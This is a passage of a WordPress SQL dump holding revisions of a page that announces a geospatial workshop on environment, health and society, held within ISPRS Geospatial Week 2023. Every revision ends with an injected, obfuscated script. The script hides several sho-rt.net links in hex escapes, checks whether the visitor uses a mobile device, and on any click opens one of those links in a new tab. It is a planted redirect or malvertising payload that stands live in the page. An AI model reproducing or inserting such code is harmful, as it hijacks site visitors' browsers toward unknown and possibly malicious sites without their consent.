x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:16:02','2022-12-07 04:16:02','',3427,'https://gsw2023.com/?p=3442',0,'revision','',0),
(3443,1,'2022-12-07 04:16:37','2022-12-07 04:16:37','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is emerging at a fast rate, and a study on Social geography is of immediate need by which qualitative and quantitative assessment of the social relations, identities and inequalities could be facilitated as part of attaining the 17 UN sustainable development goals. </em></h5>\n<h5 style=\"text-align: justify;\"><em> </em><em>The unanswered question is “How is physical geography influencing social geography”. It is understood of late that s</em>ocial geography is being influenced significantly by physical geography, pinpointing that both the physical and social environment are potential contributors to the state of environment and Health. That is why the 2015 Lancet Commission on Health and Climate Change has been formed to map out the impacts of climate change and the necessary policy responses to ensure the highest attainable health standards for populations worldwide. The major concerns of the relevant and immediate societal issues are prescribed as the themes of this workshop which are given below</h5>\n<h5><strong>The workshop on “<u>Geospatial data analytics for physical geography impact on the environment, health and society”</u>  </strong>will be part of the ISPRS Geospatial Week 2023, hosted by the Arab Academy for Science, Technology, and Maritime Transport, in parallel with several related geospatial workshops. The event will be held as a two-day single-track workshop of oral presentations and poster sessions in the context of the ISPRS Geospatial Week by WG III/9 on Geospatial environment and health analytics jointly with WG III/6 and ICWG III/IVa. <em>Application of Geospatial Technology, Geospatial data analytics to Environment, Health and Disaster Management addressing various concerns related to societal geography form the essential themes to be discussed during the workshop.  </em></h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" img_max_width=\"80px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"62\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><strong><u>Themes of the Workshop</u></strong></h5>\n<p>Extraction of the information from remote sensing images and remote sensing image sequences for application to understand pertinent environmental and socio-cultural issues related to the earth, environment and people is a major concern. <em>The topics addressing this concern form the essential themes of the workshop as stipulated below:</em></p>\n<ul>\n<li><em>How physical geography is influencing social geography</em> with a focus on geospatial technology?In general, we consider remote sensing, addressing the unique challenges due to the variety, veracity, velocity and volume of remote sensing data. These data are being made available for analysis from traditional systems such as high-resolution imaging sensors as well as innovative sources like mobile location data, social media, sensors from Internet-of-Things devices and crowdsourcing.</li>\n<li>How much do the vegetation, climate, water cycle, and land formations which are all defined as physical geography, affect society?  People interact with their physical environment through the air they breathe, the water they drink, the houses they live in, and the transportation they access to travel to work and school. A poor physical environment can affect our ability and that of our families and neighbors to live long and healthy lives.</li>\n<li>How can we create indicators derived from satellite data for assessing land use changes, urbanization, air and water quality and land degradation? They have an influence on natural resources management as well as the occurrence of various diseases, vector borne diseases, pulmonary diseases, food and waterborne diseases or non-communicable diseases.</li>\n<li>What is the current geospatial research for environmental management, air, water pollution and land degradation mapping, disease mapping, Health services, and geospatial epidemiology that could be operationalized through possible pivoting and scaling for appropriate interventions by the authorities?</li>\n<li>Studies on Remote sensing of air quality in urban areas, atmospheric aerosols, atmospheric composition, and its synergism with other data sets, including constraining greenhouse gases evolution and exchange processes</li>\n<li>Studies on state-of-the-art Geospatial and GeoAI techniques for disaster management and disaster resilience. like Geospatial Infrastructure Management Ecosystem (GeoIME) cloud-web-application including AI tools and knowledge graphs, early warning systems, monitoring, preparedness, algorithmic data analytics, and algorithms for human detection from earth observations and UAVs/MAVs images and videos and so on</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>Peng Yue, Wuhan University, PR China</li>\n<li>Weilian Li<strong>, </strong>University of Bonn, Germany</li>\n<li>Dr Suchita Gopal, Boston University. USA</li>\n<li>Dr Mahbooba Nasreen, University of Dacca, Bangladesh</li>\n<li>Dr Fazlay Faruq, University of Mississippi USA</li>\n<li>Dr Murthy Remella, Indian Space Research Organization, India</li>\n<li>Dr Nitin Kumar Tripathi, Asian institute of Technology, Thailand</li>\n<li>Dr Nelly Lucero Ramírez Serrato<strong>, </strong>National Autonomous University of Mexico, Mexico</li>\n<li>Dr Valli Manickam, Administrative Staff College of India, India</li>\n</ul>\n<p>&nbsp;</p>\n<h5><strong><u>Supporting ISPRS Working Groups:</u></strong></h5>\n<ul>\n<li>The workshop is proposed by WG III/ 9 Geospatial Environment and Health Analytics</li>\n<li>WG III/6 on Remote sensing of the Atmosphere and ICWG III/IVa on Disaster Management are the supporting working groups.</li>\n</ul>\n<h5><u><strong>Special Issue dedicated to the workshop:</strong> </u></h5>\n<p>The authors of selected papers will be invited to submit extended versions of their papers to the –Journal of Photogrammetry, Remote Sensing and Geoinformation Science. The papers can be reviewed as per the current practices of ISPRS. (<a href=\"https://www.springer.com/journal/41064\">https://www.springer.com/journal/41064)</a></p>\n<p>Professor Muralikrishna Iyyanki</p>\n<p>Chairman ISPRS WG III/9</p>\n<p><a href=\"mailto:iyyanki@berkeley.edu\">iyyanki@berkeley.edu</a></p>\n<p><a href=\"mailto:iyyanki@gmail.com\">iyyanki@gmail.com</a></p>\n<p><a href=\"mailto:ivm@ieee.org\">ivm@ieee.org</a>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"orange\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>GEOSPATIAL DATA ANALYTICS FOR PHYSICAL GEOGRAPHY IMPACT ASSESSMENT ON ENVIRONMENT, HEALTH AND SOCIETY</strong>','','inherit','closed','closed','','3427-revision-v1','','','2022-12-07 04:16:37','2022-12-07 04:16:37','',3427,'https://gsw2023.com/?p=3443',0,'revision','',0),
(3444,1,'2022-12-07 04:17:04','2022-12-07 04:17:04','<p>[vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">Geospatial data, in general, and Remote sensing data offers a detailed perspective on systems and locations that can be precious for applications ranging from natural resources management, environmental management, and weather observations to public health and disaster management. The World Meteorological Organization (WMO) released the executive action plan of early warning for all at the round table meeting on November 7, 2022. Early warning systems are imperative to adjusting to climate change adaptation and reducing disaster risk. Climate change poses a big threat to population health due to the increased risk of the spread of disease, natural disasters and air pollution, among many other things.  In terms of analysis of cause-and-effect relationships, it is established that Environmental pollutants can cause health problems like respiratory diseases, heart disease, and some types of cancer. Environmental Factors that Can impact health include chemical pollution, water pollution, air pollution, climate change, disease-causing microbes, lack of access to health care, and poor infrastructure. The entire mankind is at risk of health starting from the level of pollution <em>to psychological problems</em><em>. </em></h5>\n<h5 style=\"text-align: justify;\" ><em> </em>Geography doesn\'t just determine whether humans can live in a certain area; it also determines people\'s lifestyles as they adapt to the available food and climate patterns.​ <em>In this context, spatial distribution of social variations is 